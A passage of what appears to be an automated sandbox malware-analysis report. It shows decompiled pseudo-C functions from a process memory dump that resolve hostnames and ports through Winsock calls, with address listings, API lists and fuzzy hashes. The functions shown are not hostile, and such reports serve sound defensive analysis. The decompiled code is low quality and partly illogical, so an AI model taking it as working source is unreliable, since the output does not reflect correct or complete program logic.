                                                          			/* Returns the PEB pointer read from the TEB (fs:[0x30]). */
                                                          			E00458B34() {
                                                          
                                                          				return  *[fs:0x30];
                                                          			}

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                          • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 47%
                                                          			/* Address resolution helper. The call through the import at 0x46afac takes (node, service, &hints, &result)
                                                          			   and the result is read at +0x10 and +0x18, which matches getaddrinfo()'s addrinfo layout
                                                          			   (ai_addrlen at 0x10, ai_addr at 0x18); this identification is inferred from the struct offsets,
                                                          			   not confirmed by the report. _v44 holds the hints struct (_v44 = ai_flags, _v36 = ai_socktype,
                                                          			   _v32 = ai_protocol); "0.0.0.0" and "127.0.0.1" select a NULL node name, otherwise the host string is passed. */
                                                          			E004282EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				void _v44;
                                                          				void* _t29;
                                                          				void* _t74;
                                                          				void* _t82;
                                                          				intOrPtr _t85;
                                                          				void* _t94;
                                                          				void* _t100;
                                                          
                                                          				_t82 = __edx;
                                                          				_t29 = memcpy( &_v44, __ecx, 8 << 2);
                                                          				_t94 = _t82;
                                                          				_t74 = _t29;
                                                          				_t97 = _a4;
                                                          				_v12 = 0;
                                                          				_push(_t100);
                                                          				_push(0x428430);
                                                          				_push( *[fs:eax]);
                                                          				 *[fs:eax] = _t100 + 0xffffffffffffffe4;
                                                          				L00403114(_a4, 0x1c);
                                                          				if(_v36 != 3) {
                                                          					E00404928(_t74, "0.0.0.0");
                                                          					if(__eflags == 0) {
                                                          						L4:
                                                          						_v44 = 1;
                                                          						_v8 =  *0x46afac(0, E004049DC(_t94),  &_v44,  &_v12);
                                                          					} else {
                                                          						E00404928(_t74, 0x42845c);
                                                          						if(__eflags != 0) {
                                                          							E00404928(_t74, "127.0.0.1");
                                                          							if(__eflags == 0) {
                                                          								L7:
                                                          								_v8 =  *0x46afac(0, E004049DC(_t94),  &_v44,  &_v12);
                                                          							} else {
                                                          								E00404928(_t74, 0x42847c);
                                                          								if(__eflags != 0) {
                                                          									_v8 =  *0x46afac(E004049DC(_t74), E004049DC(_t94),  &_v44,  &_v12);
                                                          								} else {
                                                          									goto L7;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							goto L4;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					_v36 = 0;
                                                          					_v32 = 0;
                                                          					_v8 =  *0x46afac(E004049DC(_t74), 0,  &_v44,  &_v12);
                                                          				}
                                                          				if(_v8 == 0 && _v12 != 0) {
                                                          					E00402C3C( *((intOrPtr*)(_v12 + 0x18)),  *((intOrPtr*)(_v12 + 0x10)), _t97);
                                                          				}
                                                          				_pop(_t85);
                                                          				 *[fs:eax] = _t85;
                                                          				_push(E00428437);
                                                          				if(_v12 != 0) {
                                                          					return  *0x46afb0(_v12);
                                                          				}
                                                          				return 0;
                                                          			}

                                                          0x004282ec
                                                          0x004282ff
                                                          0x00428301
                                                          0x00428303
                                                          0x00428305
                                                          0x0042830a
                                                          0x0042830f
                                                          0x00428310
                                                          0x00428315
                                                          0x00428318
                                                          0x00428324
                                                          0x0042832d
                                                          0x00428360
                                                          0x00428365
                                                          0x00428375
                                                          0x00428375
                                                          0x00428394
                                                          0x00428367
                                                          0x0042836e
                                                          0x00428373
                                                          0x004283a0
                                                          0x004283a5
                                                          0x004283b5
                                                          0x004283cd
                                                          0x004283a7
                                                          0x004283ae
                                                          0x004283b3
                                                          0x004283f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004283b3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00428373
                                                          0x0042832f
                                                          0x00428331
                                                          0x00428336
                                                          0x00428351
                                                          0x00428351
                                                          0x004283f7
                                                          0x0042840d
                                                          0x0042840d
                                                          0x00428414
                                                          0x00428417
                                                          0x0042841a
                                                          0x00428423
                                                          0x00000000
                                                          0x00428429
                                                          0x0042842f

                                                          APIs
                                                          • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 0042834B
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 0042838E
                                                          • FreeAddrInfoW.WS2_32(00000000), ref: 00428429
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: getaddrinfo$AddrFreeInfo
                                                          • String ID: 0.0.0.0$127.0.0.1$::0$::1
                                                          • API String ID: 3931047987-1239866159
                                                          • Opcode ID: f13852d0eed7c319d3b1ff1539600db7db8f600b511e1b08b845160029669dde
                                                          • Instruction ID: 6e1e9209b9389df747cca7469056b7c946e14813f35791b24d7de859d8929a54
                                                          • Opcode Fuzzy Hash: f13852d0eed7c319d3b1ff1539600db7db8f600b511e1b08b845160029669dde
                                                          • Instruction Fuzzy Hash: F54171B1B01118AFDB00EFA9D844ADFBAB8EB48300F90447BF501F3641EB789944CB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 48%
                                                          			E004287FC(char __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
                                                          				char _v8;
                                                          				char _v12;
                                                          				intOrPtr _v16;
                                                          				char _v20;
                                                          				char _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				char _v40;
                                                          				void* _v41;
                                                          				void* _v42;
                                                          				void* _v43;
                                                          				intOrPtr _v44;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				intOrPtr _v72;
                                                          				char _v76;
                                                          				char _v80;
                                                          				intOrPtr _v84;
                                                          				char _v88;
                                                          				intOrPtr _v92;
                                                          				char _v96;
                                                          				intOrPtr _v100;
                                                          				char _v104;
                                                          				char _v108;
                                                          				void* _t174;
                                                          				void* _t175;
                                                          				signed int _t176;
                                                          				intOrPtr _t193;
                                                          				intOrPtr _t200;
                                                          				intOrPtr _t203;
                                                          				intOrPtr _t209;
                                                          				intOrPtr* _t212;
                                                          				void* _t213;
                                                          				void* _t214;
                                                          				void* _t215;
                                                          				intOrPtr _t216;
                                                          
                                                          				_t214 = _t215;
                                                          				_t216 = _t215 + 0xffffff98;
                                                          				_v20 = 0;
                                                          				_v24 = 0;
                                                          				_v40 = 0;
                                                          				_t209 = __ecx;
                                                          				_t174 = __edx;
                                                          				_v8 = __eax;
                                                          				E004049CC(_v8);
                                                          				 *[fs:eax] = _t216;
                                                          				 *((intOrPtr*)( *_a4 + 0x44))( *[fs:eax], 0x428a8d, _t214, __edi, __esi, __ebx, _t213);
                                                          				if(E004282D0(_t174) != 0) {
                                                          					_v12 = 0;
                                                          					_push(_t214);
                                                          					_push(0x428a42);
                                                          					_push( *[fs:eax]);
                                                          					 *[fs:eax] = _t216;
                                                          					L00403114( &_v76, 0x20);
                                                          					_v72 = 0;
                                                          					_v68 = _a8;
                                                          					_v64 = _t209;
                                                          					_v76 = 0;
                                                          					_push( &_v12);
                                                          					_push( &_v76);
                                                          					_push(0);
                                                          					_push(E004049DC(_v8));
                                                          					if( *0x46afac() == 0) {
                                                          						_v16 = _v12;
                                                          						while(_v16 != 0) {
                                                          							if(_t174 != 0x17 ||  *((intOrPtr*)(_v16 + 4)) != 2) {
                                                          								if(_t174 != 2 ||  *((intOrPtr*)(_v16 + 4)) != 0x17) {
                                                          									_v28 = 0x20;
                                                          									E00404B0C( &_v20, 0x401);
                                                          									E00404B0C( &_v24, _v28);
                                                          									_push(0xa);
                                                          									_push(_v28);
                                                          									_push(E004049DC(_v24));
                                                          									_push(0x401);
                                                          									_push(E004049DC(_v20));
                                                          									_push( *((intOrPtr*)(_v16 + 0x10)));
                                                          									_push( *((intOrPtr*)(_v16 + 0x18)));
                                                          									if( *0x46afb4() == 0) {
                                                          										E004046F8( &_v20, E004049DC(_v20));
                                                          										 *((intOrPtr*)( *_a4 + 0x38))();
                                                          									}
                                                          								}
                                                          							}
                                                          							_v16 =  *((intOrPtr*)(_v16 + 0x1c));
                                                          						}
                                                          					}
                                                          					_pop(_t193);
                                                          					 *[fs:eax] = _t193;
                                                          					_push(0x428a49);
                                                          					if(_v12 != 0) {
                                                          						return  *0x46afb0(_v12);
                                                          					}
                                                          					return 0;
                                                          				} else {
                                                          					_t175 = E004049DC(_v8);
                                                          					_push(_t175);
                                                          					if( *0x46af80() + 1 != 0) {
                                                          						 *((intOrPtr*)( *_a4 + 0x38))();
                                                          						if( *((intOrPtr*)( *_a4 + 0x14))() == 0) {
                                                          							 *((intOrPtr*)( *_a4 + 0x38))();
                                                          						}
                                                          						_pop(_t200);
                                                          						 *[fs:eax] = _t200;
                                                          						_push(0x428a94);
                                                          						E00404500( &_v40);
                                                          						E00404524( &_v24, 2);
                                                          						return E00404500( &_v8);
                                                          					} else {
                                                          						E0042805C( *0x4708dc);
                                                          						 *[fs:eax] = _t216;
                                                          						 *0x46af44(_t175,  *[fs:eax], 0x42890a, _t214);
                                                          						_v32 = 0;
                                                          						if(_v32 != 0) {
                                                          							_v36 =  *((intOrPtr*)(_v32 + 0xc));
                                                          							_t176 = 0;
                                                          							while(1) {
                                                          								_t212 =  *((intOrPtr*)(_v36 + _t176 * 4));
                                                          								if(_t212 == 0) {
                                                          									goto L6;
                                                          								}
                                                          								_v44 =  *_t212;
                                                          								_v108 = 0;
                                                          								_v104 = 0;
                                                          								_v100 = 0;
                                                          								_v96 = 0;
                                                          								_v92 = 0;
                                                          								_v88 = 0;
                                                          								_v84 = 0;
                                                          								_v80 = 0;
                                                          								L004093FC("%d.%d.%d.%d", 3,  &_v108,  &_v40);
                                                          								 *((intOrPtr*)( *_a4 + 0x38))();
                                                          								_t176 = _t176 + 1;
                                                          							}
                                                          						}
                                                          						L6:
                                                          						_pop(_t203);
                                                          						 *[fs:eax] = _t203;
                                                          						_push(0x428a49);
                                                          						return E00428064( *0x4708dc);
                                                          					}
                                                          				}
                                                          			}

                                                          0x004287fd
                                                          0x004287ff
                                                          0x00428807
                                                          0x0042880a
                                                          0x0042880d
                                                          0x00428810
                                                          0x00428812
                                                          0x00428814
                                                          0x0042881a
                                                          0x0042882a
                                                          0x00428832
                                                          0x0042883e
                                                          0x00428923
                                                          0x00428928
                                                          0x00428929
                                                          0x0042892e
                                                          0x00428931
                                                          0x0042893e
                                                          0x00428945
                                                          0x0042894b
                                                          0x0042894e
                                                          0x00428953
                                                          0x00428959
                                                          0x0042895d
                                                          0x0042895e
                                                          0x00428968
                                                          0x00428973
                                                          0x0042897c
                                                          0x00428a1a
                                                          0x00428987
                                                          0x00428995
                                                          0x004289a5
                                                          0x004289b1
                                                          0x004289bc
                                                          0x004289c1
                                                          0x004289c6
                                                          0x004289cf
                                                          0x004289d0
                                                          0x004289d9
                                                          0x004289e0
                                                          0x004289e7
                                                          0x004289f2
                                                          0x00428a01
                                                          0x00428a0e
                                                          0x00428a0e
                                                          0x004289f2
                                                          0x00428995
                                                          0x00428a17
                                                          0x00428a17
                                                          0x00428a1a
                                                          0x00428a26
                                                          0x00428a29
                                                          0x00428a2c
                                                          0x00428a35
                                                          0x00000000
                                                          0x00428a3b
                                                          0x00428a41
                                                          0x00428844
                                                          0x0042884c
                                                          0x0042884e
                                                          0x00428856
                                                          0x00428919
                                                          0x00428a53
                                                          0x00428a5f
                                                          0x00428a5f
                                                          0x00428a64
                                                          0x00428a67
                                                          0x00428a6a
                                                          0x00428a72
                                                          0x00428a7f
                                                          0x00428a8c
                                                          0x0042885c
                                                          0x00428861
                                                          0x00428871
                                                          0x00428875
                                                          0x0042887b
                                                          0x00428882
                                                          0x0042888a
                                                          0x0042888d
                                                          0x004288e8
                                                          0x004288eb
                                                          0x004288f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00428893
                                                          0x0042889f
                                                          0x004288a2
                                                          0x004288ab
                                                          0x004288ae
                                                          0x004288b7
                                                          0x004288ba
                                                          0x004288c3
                                                          0x004288c6
                                                          0x004288d7
                                                          0x004288e4
                                                          0x004288e7
                                                          0x004288e7
                                                          0x004288e8
                                                          0x004288f2
                                                          0x004288f4
                                                          0x004288f7
                                                          0x004288fa
                                                          0x00428909
                                                          0x00428909
                                                          0x00428856

                                                          APIs
                                                          • inet_addr.WS2_32(00000000), ref: 0042884F
                                                          • gethostbyname.WS2_32(00000000), ref: 00428875
                                                          • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 00428969
                                                          • FreeAddrInfoW.WS2_32(00000000), ref: 00428A3B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: AddrFreeInfogetaddrinfogethostbynameinet_addr
                                                          • String ID: $%d.%d.%d.%d$0.0.0.0
                                                          • API String ID: 2886313179-1131994233
                                                          • Opcode ID: adbdb7855e5e8b6d5f1d4913bd586f5d75273ba707ff385d4251d0a6a012952d
                                                          • Instruction ID: af6fb9e9a92a67624a5747da6f0d21091b3994723e0146836a6ab0704b51f165
                                                          • Opcode Fuzzy Hash: adbdb7855e5e8b6d5f1d4913bd586f5d75273ba707ff385d4251d0a6a012952d
                                                          • Instruction Fuzzy Hash: B9813AB4A012189FCB10DFA9D885AAEBBF4FF49300F90846AE904E7351DB389D41CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 54%
                                                          			E00428480(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				intOrPtr* _v20;
                                                          				intOrPtr _v24;
                                                          				void* _v28;
                                                          				char _v29;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				void* _v60;
                                                          				char _v64;
                                                          				intOrPtr _v84;
                                                          				intOrPtr _v88;
                                                          				void* _v92;
                                                          				char _v96;
                                                          				char _v124;
                                                          				void _v152;
                                                          				intOrPtr _t80;
                                                          				void* _t84;
                                                          				void* _t90;
                                                          				void* _t125;
                                                          				intOrPtr _t146;
                                                          				intOrPtr _t150;
                                                          				intOrPtr _t154;
                                                          				void* _t157;
                                                          				void* _t161;
                                                          				void* _t163;
                                                          				void* _t164;
                                                          				intOrPtr _t166;
                                                          				void* _t169;
                                                          				void* _t170;
                                                          				intOrPtr _t171;
                                                          				intOrPtr _t178;
                                                          
                                                          				_t169 = _t170;
                                                          				_t171 = _t170 + 0xffffff6c;
                                                          				_push(__ebx);
                                                          				_push(__esi);
                                                          				_push(__edi);
                                                          				_v12 = __ecx;
                                                          				_v8 = __edx;
                                                          				_t125 = __eax;
                                                          				_t154 = _a12;
                                                          				_t163 = _a16;
                                                          				E004049CC(_v8);
                                                          				E004049CC(_v12);
                                                          				_push(_t169);
                                                          				_push(0x4286ac);
                                                          				_push( *[fs:eax]);
                                                          				 *[fs:eax] = _t171;
                                                          				_v16 = 0;
                                                          				L00403114(_t125, 0x1c);
                                                          				if(E004282D0(_t163) != 0) {
                                                          					L00403114( &_v64, 0x20);
                                                          					L00403114( &_v96, 0x20);
                                                          					_v29 = 0;
                                                          					__eflags = _t163;
                                                          					if(__eflags != 0) {
                                                          						_v60 = _t163;
                                                          					} else {
                                                          						__eflags = _a4;
                                                          						if(__eflags == 0) {
                                                          							_v92 = 2;
                                                          							_v60 = 0x17;
                                                          							_v29 = 1;
                                                          						} else {
                                                          							_v60 = 2;
                                                          							_v92 = 0x17;
                                                          							_v29 = 1;
                                                          						}
                                                          					}
                                                          					_v56 = _a8;
                                                          					_t80 = _t154;
                                                          					_v52 = _t80;
                                                          					_v88 = _v56;
                                                          					_v84 = _t80;
                                                          					_v16 = E004282EC(_t125,  &_v64, _v12, _t154, _t163, __eflags,  &_v124);
                                                          					_t164 =  &_v124;
                                                          					_t84 = memcpy(_t125, _t164, 7 << 2);
                                                          					_t157 = _t164 + 0xe;
                                                          					__eflags = _t84;
                                                          					if(_t84 != 0) {
                                                          						__eflags = _v29;
                                                          						if(__eflags != 0) {
                                                          							_t90 = E004282EC(_t125,  &_v96, _v12, _t157, _t164, __eflags,  &_v152);
                                                          							_v16 = _t90;
                                                          							__eflags = _t90;
                                                          							if(_t90 == 0) {
                                                          								memcpy(_t125,  &_v152, 7 << 2);
                                                          							}
                                                          						}
                                                          					}
                                                          					__eflags = 0;
                                                          					_pop(_t146);
                                                          					 *[fs:eax] = _t146;
                                                          					_push(E004286B3);
                                                          					return E00404524( &_v12, 2);
                                                          				} else {
                                                          					E0042805C( *0x4708dc);
                                                          					 *[fs:eax] = _t171;
                                                          					 *_t125 = 2;
                                                          					 *0x46af40(_t154,  *[fs:eax], 0x4285c9, _t169);
                                                          					_v20 = 0;
                                                          					_v24 = 0;
                                                          					_t176 = _v20;
                                                          					if(_v20 != 0 && E00408688(0, 0xffffffffffffffff, _t176) + 1 == 0) {
                                                          						_v24 =  *0x46af34(E004049DC(_v12),  *_v20);
                                                          					}
                                                          					_t178 = _v24;
                                                          					if(_t178 != 0) {
                                                          						 *((short*)(_t125 + 2)) =  *((intOrPtr*)(_v24 + 8));
                                                          					} else {
                                                          						 *((short*)(_t125 + 2)) =  *0x46af84(E00408688(0, 0, _t178));
                                                          					}
                                                          					E00404928(_v8, "255.255.255.255");
                                                          					if(_t178 != 0) {
                                                          						_t161 = E004049DC(_v8);
                                                          						_t166 =  *0x46af80(_t161);
                                                          						 *((intOrPtr*)(_t125 + 4)) = _t166;
                                                          						__eflags = _t166 + 1;
                                                          						if(_t166 + 1 == 0) {
                                                          							_v28 =  *0x46af44(_t161);
                                                          							_v16 =  *0x46af30();
                                                          							__eflags = _v28;
                                                          							if(_v28 != 0) {
                                                          								 *((intOrPtr*)(_t125 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc))))));
                                                          							}
                                                          						}
                                                          					} else {
                                                          						 *((intOrPtr*)(_t125 + 4)) = 0xffffffff;
                                                          					}
                                                          					_pop(_t150);
                                                          					 *[fs:eax] = _t150;
                                                          					_push(E00428691);
                                                          					return E00428064( *0x4708dc);
                                                          				}
                                                          			}

                                                          0x00428481
                                                          0x00428483
                                                          0x00428489
                                                          0x0042848a
                                                          0x0042848b
                                                          0x0042848c
                                                          0x0042848f
                                                          0x00428492
                                                          0x00428494
                                                          0x00428497
                                                          0x0042849d
                                                          0x004284a5
                                                          0x004284ac
                                                          0x004284ad
                                                          0x004284b2
                                                          0x004284b5
                                                          0x004284ba
                                                          0x004284c6
                                                          0x004284d4
                                                          0x004285da
                                                          0x004285e9
                                                          0x004285ee
                                                          0x004285f2
                                                          0x004285f4
                                                          0x00428624
                                                          0x004285f6
                                                          0x004285f6
                                                          0x004285fa
                                                          0x00428610
                                                          0x00428617
                                                          0x0042861e
                                                          0x004285fc
                                                          0x004285fc
                                                          0x00428603
                                                          0x0042860a
                                                          0x0042860a
                                                          0x004285fa
                                                          0x0042862a
                                                          0x0042862d
                                                          0x0042862f
                                                          0x00428635
                                                          0x00428638
                                                          0x0042864d
                                                          0x00428652
                                                          0x0042865a
                                                          0x0042865a
                                                          0x0042865c
                                                          0x0042865e
                                                          0x00428660
                                                          0x00428664
                                                          0x00428676
                                                          0x0042867b
                                                          0x0042867e
                                                          0x00428680
                                                          0x0042868f
                                                          0x0042868f
                                                          0x00428680
                                                          0x00428664
                                                          0x00428691
                                                          0x00428693
                                                          0x00428696
                                                          0x00428699
                                                          0x004286ab
                                                          0x004284da
                                                          0x004284df
                                                          0x004284ef
                                                          0x004284f2
                                                          0x004284f8
                                                          0x004284fe
                                                          0x00428503
                                                          0x00428506
                                                          0x0042850a
                                                          0x0042852f
                                                          0x0042852f
                                                          0x00428532
                                                          0x00428536
                                                          0x00428556
                                                          0x00428538
                                                          0x00428549
                                                          0x00428549
                                                          0x00428562
                                                          0x00428567
                                                          0x0042857a
                                                          0x00428583
                                                          0x00428585
                                                          0x00428588
                                                          0x00428589
                                                          0x00428592
                                                          0x0042859b
                                                          0x0042859e
                                                          0x004285a2
                                                          0x004285ae
                                                          0x004285ae
                                                          0x004285a2
                                                          0x00428569
                                                          0x00428569
                                                          0x00428569
                                                          0x004285b3
                                                          0x004285b6
                                                          0x004285b9
                                                          0x004285c8
                                                          0x004285c8

                                                          APIs
                                                          • getprotobynumber.WS2_32(00000000), ref: 004284F8
                                                          • getservbyname.WS2_32(00000000,?), ref: 00428529
                                                          • htons.WS2_32(00000000), ref: 00428543
                                                          • inet_addr.WS2_32(00000000), ref: 0042857D
                                                          • gethostbyname.WS2_32(00000000), ref: 0042858C
                                                          • WSAGetLastError.WS2_32(?,00000000,004286AC,?,?,?,?,?,0042C70A,00450460,00000000,?,?,00000000,?,00000000), ref: 00428595
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastgethostbynamegetprotobynumbergetservbynamehtonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 1512579943-2422070025
                                                          • Opcode ID: 69bf8126dd49c273e8caeab2d162fdc2ab9d5d1529d8cc1c0f570dd5bb3e6544
                                                          • Instruction ID: e0f867c82261a1ad1d64ef2b8e5d84a6cce8a1ee9ccc3a6e3b2a6ba982d300ba
                                                          • Opcode Fuzzy Hash: 69bf8126dd49c273e8caeab2d162fdc2ab9d5d1529d8cc1c0f570dd5bb3e6544
                                                          • Instruction Fuzzy Hash: 40616EB0A01218DFDB10DFA8D845A9EBBF4EF48314F51806EE805A7391DB789E41CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 25%
                                                          			E00428AC4(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                          				intOrPtr _v8;
                                                          				short _v10;
                                                          				intOrPtr* _v16;
                                                          				intOrPtr _v20;
                                                          				char _v24;
                                                          				intOrPtr _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				char _v56;
                                                          				intOrPtr _t56;
                                                          				intOrPtr _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t99;
                                                          				intOrPtr _t100;
                                                          				void* _t103;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          				intOrPtr _t107;
                                                          
                                                          				_t90 = __ecx;
                                                          				_t105 = _t106;
                                                          				_t107 = _t106 + 0xffffffcc;
                                                          				_t89 = __ecx;
                                                          				_t103 = __edx;
                                                          				_v8 = __eax;
                                                          				E004049CC(_v8);
                                                          				_push(_t105);
                                                          				_push(0x428c5b);
                                                          				_push( *[fs:eax]);
                                                          				 *[fs:eax] = _t107;
                                                          				_v10 = 0;
                                                          				if(E004282D0(_t103) != 0) {
                                                          					_v24 = 0;
                                                          					 *[fs:edx] = _t107;
                                                          					L00403114( &_v56, 0x20);
                                                          					_v52 = 0;
                                                          					_v48 = _a4;
                                                          					_v44 = _t89;
                                                          					_v56 = 1;
                                                          					_t56 =  *0x46afac(0, E004049DC(_v8),  &_v56,  &_v24,  *[fs:edx], 0x428c3e, _t105);
                                                          					__eflags = _t56;
                                                          					if(_t56 == 0) {
                                                          						__eflags = _v24;
                                                          						if(_v24 != 0) {
                                                          							_t60 = _v24;
                                                          							__eflags =  *((intOrPtr*)(_t60 + 4)) - 2;
                                                          							if( *((intOrPtr*)(_t60 + 4)) == 2) {
                                                          								_v10 =  *0x46af84( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x18)) + 2)));
                                                          							}
                                                          							_t61 = _v24;
                                                          							__eflags =  *((intOrPtr*)(_t61 + 4)) - 0x17;
                                                          							if( *((intOrPtr*)(_t61 + 4)) == 0x17) {
                                                          								_v10 =  *0x46af84( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x18)) + 2)));
                                                          							}
                                                          						}
                                                          					}
                                                          					_pop(_t99);
                                                          					 *[fs:eax] = _t99;
                                                          					_push(0x428c45);
                                                          					__eflags = _v24;
                                                          					if(_v24 != 0) {
                                                          						return  *0x46afb0(_v24);
                                                          					}
                                                          					return 0;
                                                          				} else {
                                                          					E0042805C( *0x4708dc);
                                                          					 *[fs:eax] = _t107;
                                                          					 *0x46af40(__ecx,  *[fs:eax], 0x428b83, _t105);
                                                          					_v16 = 0;
                                                          					_v20 = 0;
                                                          					if(_v16 != 0) {
                                                          						_v20 =  *0x46af34(E004049DC(_v8),  *_v16);
                                                          					}
                                                          					_t111 = _v20;
                                                          					if(_v20 != 0) {
                                                          						_v10 =  *0x46af84( *((intOrPtr*)(_v20 + 8)));
                                                          					} else {
                                                          						_v10 = E00408688(_t90, 0, _t111);
                                                          					}
                                                          					_pop(_t100);
                                                          					 *[fs:eax] = _t100;
                                                          					_push(0x428c45);
                                                          					return E00428064( *0x4708dc);
                                                          				}
                                                          			}

                                                          0x00428ac4
                                                          0x00428ac5
                                                          0x00428ac7
                                                          0x00428acc
                                                          0x00428ace
                                                          0x00428ad0
                                                          0x00428ad6
                                                          0x00428add
                                                          0x00428ade
                                                          0x00428ae3
                                                          0x00428ae6
                                                          0x00428ae9
                                                          0x00428af8
                                                          0x00428b8c
                                                          0x00428b9a
                                                          0x00428ba7
                                                          0x00428bae
                                                          0x00428bb4
                                                          0x00428bb7
                                                          0x00428bba
                                                          0x00428bd4
                                                          0x00428bda
                                                          0x00428bdc
                                                          0x00428bde
                                                          0x00428be2
                                                          0x00428be4
                                                          0x00428be7
                                                          0x00428beb
                                                          0x00428bfe
                                                          0x00428bfe
                                                          0x00428c02
                                                          0x00428c05
                                                          0x00428c09
                                                          0x00428c1c
                                                          0x00428c1c
                                                          0x00428c09
                                                          0x00428be2
                                                          0x00428c22
                                                          0x00428c25
                                                          0x00428c28
                                                          0x00428c2d
                                                          0x00428c31
                                                          0x00000000
                                                          0x00428c37
                                                          0x00428c3d
                                                          0x00428afe
                                                          0x00428b03
                                                          0x00428b13
                                                          0x00428b17
                                                          0x00428b1d
                                                          0x00428b22
                                                          0x00428b29
                                                          0x00428b40
                                                          0x00428b40
                                                          0x00428b43
                                                          0x00428b47
                                                          0x00428b67
                                                          0x00428b49
                                                          0x00428b53
                                                          0x00428b53
                                                          0x00428b6d
                                                          0x00428b70
                                                          0x00428b73
                                                          0x00428b82
                                                          0x00428b82

                                                          APIs
                                                          • getprotobynumber.WS2_32 ref: 00428B17
                                                          • getservbyname.WS2_32(00000000,?), ref: 00428B3A
                                                          • htons.WS2_32(?), ref: 00428B61
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 00428BD4
                                                          • htons.WS2_32(?), ref: 00428BF8
                                                          • htons.WS2_32(?), ref: 00428C16
                                                          • FreeAddrInfoW.WS2_32(00000000), ref: 00428C37
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: htons$AddrFreeInfogetaddrinfogetprotobynumbergetservbyname
                                                          • String ID:
                                                          • API String ID: 1097464056-0
                                                          • Opcode ID: ac2a11e55bccbab7bf93bd81ed185ae8c57234f38b9f9a06c2540bd8b9c1855b
                                                          • Instruction ID: bc0b1e3f7fe3b0363850202feb9de7119bd4d1467b0015dac942d594976a0245
                                                          • Opcode Fuzzy Hash: ac2a11e55bccbab7bf93bd81ed185ae8c57234f38b9f9a06c2540bd8b9c1855b
                                                          • Instruction Fuzzy Hash: 4D412EB4A01618EFDB04DFA5E945A9EBBF9FF08300F51446AF404E7251DB789E00CB6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%